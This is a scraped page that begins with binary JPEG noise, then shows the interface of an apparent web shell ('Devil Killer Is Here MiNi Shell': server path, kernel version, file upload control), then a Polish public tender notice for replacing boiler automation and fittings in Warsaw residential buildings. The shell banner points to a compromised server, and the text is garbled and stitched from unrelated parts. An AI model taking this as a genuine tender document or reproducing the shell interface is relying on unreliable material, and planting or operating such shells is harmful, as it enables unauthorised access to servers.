JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210520/0005996801-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00059968 z dnia 2021-05-20</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wymiana automatyki sterującej oraz armatury w kotłowniach gazowych zlokalizowanych w budynkach mieszkalnych wielorodzinnych przy ul. Ciupagi 2 blok B, C, D, I, II, III w Warszawie. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Mienia Skarbu Państwa</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 140001459</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Prosta 69</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-838</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(22) 551-21-00</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zmsp@zmsp.warszawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://zmsp.warszawa.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Administrowanie nieruchomościami </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wymiana automatyki sterującej oraz armatury w kotłowniach gazowych zlokalizowanych w budynkach mieszkalnych wielorodzinnych przy ul. Ciupagi 2 blok B, C, D, I, II, III w Warszawie. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2668d3e3-b948-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00059968</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> zmsp.eb2b.com.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zmsp.eb2b.com.pl/ oraz zmsp@zmsp.warszawa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między zamawiającym a wykonawcami odbywa się wyłącznie przy użyciu środków komunikacji elektronicznej zgodnie z art. 61 Ustawy PZP, za pośrednictwem elektronicznej platformy zakupowej (dalej: „Platforma”) pod adresem: https://zmsp.eb2b.com.pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający wymaga dołączenia katalogu elektronicznego do oferty</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacja dla Wykonawców<br/>dot. Przetwarzania danych osobowych w postępowaniu o udzielenie <br/>zamówienia prowadzonego przez Zarząd Mienia Skarbu Państwa<br/>Załącznik nr 3 do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WNP-000002/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie wymiany automatyki sterującej oraz armatury w kotłowniach gazowych zlokalizowanych w budynkach mieszkalnych wielorodzinnych przy ul. Ciupagi 2 blok B, C, D, I, II, III w Warszawie. <br/><br/>Stan istniejący:<br/>obejmuje kotłownie gazowe w budynkach mieszkalnych wielorodzinnych zlokalizowanych przy ul. Ciupagi 2 blok B, C, D, I, II, III w Warszawie”. <br/>Budynki wyposażone są w jeden obieg grzewczy z mieszaczem oraz instalację centralnej ciepłej wody użytkowej. <br/><br/>1) Kotłownia gazowa, c.o. i c.w.u. w budynku przy ul. Ciupagi blok B:<br/>Dwa kotły wodne niskotemperaturowe w kaskadzie, o mocy 135 kW z palnikiem gazowym.<br/>Czynnik roboczy: woda, maksymalna temperatura dopuszczalna 100°C.<br/>Ciśnienie dopuszczalne: 3,00 bar. <br/>Źródło ciepłej wody użytkowej: dwa zasobniki o pojemności 500 l .<br/>Czynnik roboczy: woda, maksymalna temperatura dopuszczalna 70°C.<br/>Ciśnienie dopuszczalne: 0,60 MPa <br/><br/>2) Kotłownia gazowa, c.o. i c.w.u. w budynku przy ul. Ciupagi blok C:<br/>Dwa kotły wodne niskotemperaturowe w kaskadzie, o mocy 110 kW z palnikiem gazowym.<br/>Czynnik roboczy: woda, maksymalna temperatura dopuszczalna 100°C.<br/>Ciśnienie dopuszczalne: 3,00 bar <br/>Źródło ciepłej wody użytkowej: dwa zasobniki o pojemności 500 l .<br/>Czynnik roboczy: woda, maksymalna temperatura dopuszczalna 70°C.<br/>Ciśnienie dopuszczalne: 0,60 MPa. <br/><br/>3) Kotłownia gazowa co. i c.w.u. w budynku przy ul. Ciupagi 2 blok D:<br/>Dwa kotły wodne niskotemperaturowe w kaskadzie, o mocy 190 kW z palnikiem gazowym.<br/>Czynnik roboczy: woda, maksymalna temperatura dopuszczalna 100°C.<br/>Ciśnienie dopuszczalne: 3,00 bar. <br/>Źródło ciepłej wody użytkowej: dwa zasobniki o pojemności 500 l .<br/>Czynnik roboczy: woda, maksymalna temperatura dopuszczalna 70°C.<br/>Ciśnienie dopuszczalne: 0,60 MPa. <br/><br/>3.1. Kotłownia zasila węzeł cieplny, co. i c.w.u. w budynku przy ul. Ciupagi 2 blok A wraz z pomieszczeniem źródła ciepłej wody użytkowej. <br/>Źródło ciepłej wody użytkowej: dwa zasobniki o pojemności 500 l.<br/>Czynnik roboczy: woda, maksymalna temperatura dopuszczalna 70°C.<br/>Ciśnienie dopuszczalne: 0,60 MPa.<br/><br/>4) Kotłownia gazowa c.o. i c.w.u. w budynku przy ul. Ciupagi 2 blok I:<br/>Dwa kotły wodne niskotemperaturowe w kaskadzie, o mocy 81 kW z palnikiem gazowym.<br/>Czynnik roboczy: woda, maksymalna temperatura dopuszczalna 100°C.<br/>Ciśnienie dopuszczalne: 3,00 bar. <br/>Źródło ciepłej wody użytkowej: dwa zasobniki o pojemności 500 l .<br/>Czynnik roboczy: woda, maksymalna temperatura dopuszczalna 70°C.<br/>Ciśnienie dopuszczalne: 0,60 MPa.<br/><br/>5) Kotłownia gazowa c.o. i c.w.u. w budynku przy ul. Ciupagi 2 blok II:<br/>Dwa kotły wodne niskotemperaturowe w kaskadzie, o mocy 81 kW z palnikiem gazowym.<br/>Czynnik roboczy: woda, maksymalna temperatura dopuszczalna 100°C.<br/>Ciśnienie dopuszczalne: 3,00 bar.<br/>Źródło ciepłej wody użytkowej: dwa zasobniki o pojemności 500 l .<br/>Czynnik roboczy: woda, maksymalna temperatura dopuszczalna 70°C.<br/>Ciśnienie dopuszczalne: 0,60 MPa. <br/><br/>6) Kotłownia gazowa co. i c.w.u. w budynku przy ul. Ciupagi 2 blok III:<br/>Dwa kotły wodne niskotemperaturowe w kaskadzie, o mocy 81 kW z palnikiem gazowym.<br/>Czynnik roboczy: woda, maksymalna temperatura dopuszczalna 100°C.<br/>Ciśnienie dopuszczalne: 3,00 bar. <br/>Źródło ciepłej wody użytkowej: dwa zasobniki o pojemności 500 l .<br/>Czynnik roboczy: woda, maksymalna temperatura dopuszczalna 70°C.<br/>Ciśnienie dopuszczalne: 0,60 MPa. <br/><br/>Zakres robót obejmuje w szczególności.<br/>1) Kotłownia gazowa, c.o. i c.w.u. w budynku przy ul. Ciupagi 2 blok B:<br/>•	Wymiana dwóch tablic na kotłach do sterowania palnika dwustopniowego i automatyki sterującej kaskadą kotłów oraz jednym obiegiem grzewczym z mieszaczem i jednym obiegiem bezpośrednim centralnej ciepłej wody.<br/>•	Wymiana okablowania elektrycznego do automatyki i zabezpieczenie przewodów elektrycznych w kotłowni.<br/>•	Wymiana napędu na zaworze mieszających do obiegu instalacji centralnego ogrzewania.<br/>•	Wymiana armatury obiegów kotłowych:<br/>	zawór odcinający kulowy z dźwignią DN32<br/>	filtr skośny siatkowy DN32<br/>•	Wykonanie oczyszczenia i zabezpieczenia antykorozyjnego obudowy kotła. <br/>•	Uruchomienie i regulacja.<br/>2) Kotłownia gazowa, c.o. i c.w.u. w budynku przy ul. Ciupagi 2 blok C:<br/>•	Wymiana dwóch tablic na kotłach do sterowania palnika dwustopniowego i automatyki sterującej kaskadą kotłów oraz jednym obiegiem grzewczym z mieszaczem i jednym obiegiem bezpośrednim centralnej ciepłej wody.<br/>•	Wymiana okablowania elektrycznego do automatyki i zabezpieczenie przewodów elektrycznych w kotłowni.<br/>•	Uzupełnienie izolacji na instalacji centralnej ciepłej wody.<br/>•	Wykonanie izolacji na wymienniku JAD.<br/>•	Uruchomienie i regulacja.<br/>3) Kotłownia gazowa, c.o. i c.w.u. w budynku przy ul. Ciupagi 2 blok D:<br/>•	Wymiana dwóch tablic na kotłach do sterowania palnika dwustopniowego i automatyki sterującej kaskadą kotłów oraz jednym obiegiem grzewczym z mieszaczem i jednym obiegiem bezpośrednim centralnej ciepłej wody.<br/>•	Wymiana okablowania elektrycznego do automatyki i zabezpieczenie przewodów elektrycznych w kotłowni.<br/>•	Wymiana armatury centralnej ciepłej wody w kotłowni:<br/>	zawór odcinający kulowy z dźwignią DN32.<br/>	filtr siatkowy skośny DN32.<br/>	wymiana armatury obiegów kotłowych:<br/>	zawór odcinający kulowy z dźwignią DN40<br/>•	Wymiana zaworu bezpieczeństwa na kotle.<br/>•	Oczyszczenie obiegów kotłowych i zabezpieczenie powłoką antykorozyjną. <br/>•	Uruchomienie i regulacja.<br/>4) Kotłownia gazowa, c.o. i c.w.u. w budynku przy ul. Ciupagi 2 blok I:<br/>•	Wymiana dwóch tablic na kotłach do sterowania palnika dwustopniowego i automatyki sterującej kaskadą kotłów oraz jednym obiegiem grzewczym z mieszaczem i jednym obiegiem bezpośrednim centralnej ciepłej wody.<br/>•	Wymiana okablowania elektrycznego do automatyki i zabezpieczenie przewodów elektrycznych w kotłowni.<br/>•	Wymiana napędu na zaworze mieszających do obiegu instalacji centralnego ogrzewania.<br/>•	Uruchomienie i regulacja.<br/>5) Kotłownia gazowa, c.o. i c.w.u. w budynku przy ul. Ciupagi 2 blok II:<br/>•	Wymiana dwóch tablic na kotłach do sterowania palnika dwustopniowego i automatyki sterującej kaskadą kotłów oraz jednym obiegiem grzewczym z mieszaczem i jednym obiegiem bezpośrednim centralnej ciepłej wody.<br/>•	Wymiana okablowania elektrycznego do automatyki i zabezpieczenie przewodów elektrycznych w kotłowni.<br/>•	Wykonanie izolacji obiegów wody kotłowej.<br/>•	Wymiana zaworu bezpieczeństwa na kotle.<br/>•	Uruchomienie i regulacja.<br/>6) Kotłownia gazowa, c.o. i c.w.u. w budynku przy ul. Ciupagi 2 blok III:<br/>•	Wymiana dwóch tablic na kotłach do sterowania palnika dwustopniowego i automatyki sterującej kaskadą kotłów oraz jednym obiegiem grzewczym z mieszaczem i jednym obiegiem bezpośrednim centralnej ciepłej wody.<br/>•	Wymiana okablowania elektrycznego do automatyki i zabezpieczenie przewodów elektrycznych w kotłowni.<br/>•	Wymiana zaworu bezpieczeństwa na kotle.<br/>•	Uruchomienie i regulacja. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">50510000-3 - Usługi w zakresie napraw i konserwacji pomp, zaworów, zaworów odcinających i pojemników metalowych</p> <p class="mb-0">50720000-8 - Usługi w zakresie napraw i konserwacji centralnego ogrzewania</p> <p class="mb-0">50721000-5 - Obsługa instalacji grzewczych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Oceniane będą wyłącznie Oferty nie odrzucone. <br/>2.	Przy wyborze najkorzystniejszej Oferty Zamawiający będzie kierował się niżej opisanymi kryteriami: <br/>Cena – waga 60 %.<br/>Okres Gwarancji- waga 40 %<br/>3.	Przy ocenie Ofert wartość wagowa wyrażona w procentach będzie wyrażona w punktach (1% = 1 pkt). Punkty w ramach kryterium oceny ofert przyznane zostaną do 2 miejsca po przecinku.<br/>4.	Za najkorzystniejszą Ofertę uważa się ofertę, która uzyska największą liczbę punktów<br/>5.	Zamawiający jako najkorzystniejszą ofertę wybierze ofertę Wykonawcy, która uzyska największą liczbę punktów w ramach kryterium oceny ofert. <br/>6.	Sposób oceny Ofert określony w ust. 3-5 dotyczy zarówno oceny Ofert, złożonych w odpowiedzi na ogłoszenie o zamówieniu, jak i Ofert dodatkowych, jeżeli Zamawiający będzie prowadził negocjacje.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące: <br/><br/>› zdolności technicznej <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Zamawiający - przed wyborem najkorzystniejszej oferty – z zastrzeżeniem art. 274 ust. 4 ustawy, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni aktualnych na dzień złożenia podmiotowych środków dowodowych wskazanych w załączniku nr 5 do SWZ (pozycje „na wezwanie”):<br/>› potwierdzających spełnianie warunków udziału w postępowaniu, <br/>2.	Oświadczenia i dokumenty, o których mowa w niniejszym rozdziale oraz w rozdziale 14 ust. 5, muszą spełniać wymagania określone w ustawie i w przepisach rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23.12.2020 r. ws. podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy, a także wymagania określone w rozporządzeniu Prezesa Rady Ministrów z dnia 30.12. 2020 r. ws. sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">wykonawca jest zobowiązany wykazać, tj.:<br/><br/>1) w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał co najmniej 2 (zamówienia ) zamówienie (umowę) o wartości łącznej nie mniejszej niż 200 000,00 zł brutto, polegające na wykonaniu robót budowlanych obejmujących m.in. wymianę automatyki sterującej oraz armatury w kotłowniach gazowych. <br/>2) Wykonawca zobowiązany jest wykazać, że dysponuje osobami, które zostaną <br/> skierowane do realizacji zamówienia, posiadającymi:<br/>› uprawnienia bez ograniczeń do kierowania robotami budowlanymi, zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane, w zakresie poniższych specjalności:<br/><br/>a.	instalacyjnej w zakresie instalacji i urządzeń elektrycznych - co najmniej 1 (jedna) osoba, która będzie pełniła funkcję kierownik robót elektrycznych;<br/>b.	instalacyjnej w zakresie instalacji i urządzeń sanitarnych - co najmniej 1 (jedna) osoba, która będzie pełniła funkcję kierownik robót sanitarnych.<br/>Uwaga:</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do Oferty oświadczenie, o którym mowa w art. 117 ust. 4 ustawy, z którego wynika, które roboty budowlane i usługi wykonają poszczególni Wykonawcy.<br/>2.	Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>3.	W celu potwierdzenia, że osoby lub osoba jest uprawniona do złożenia Oferty Wykonawcy, w rozumieniu przepisów ustawy i postanowień SWZ, Zamawiający żąda złożenia w formie elektronicznej. <br/>1)	dokumentu potwierdzającego umocowanie do reprezentowania odpowiednio Wykonawcy lub Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru (Wykonawca nie jest zobowiązany do złożenia takich dokumentów, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów); <br/>2)	pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy (jeżeli umocowanie do reprezentowania nie wynika z dokumentu, o którym mowa w pkt. 1) w przypadku osoby działającej w imieniu Wykonawcy; <br/>3)	postanowienie pkt 2 stosuje się odpowiednio do osoby działającej w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> 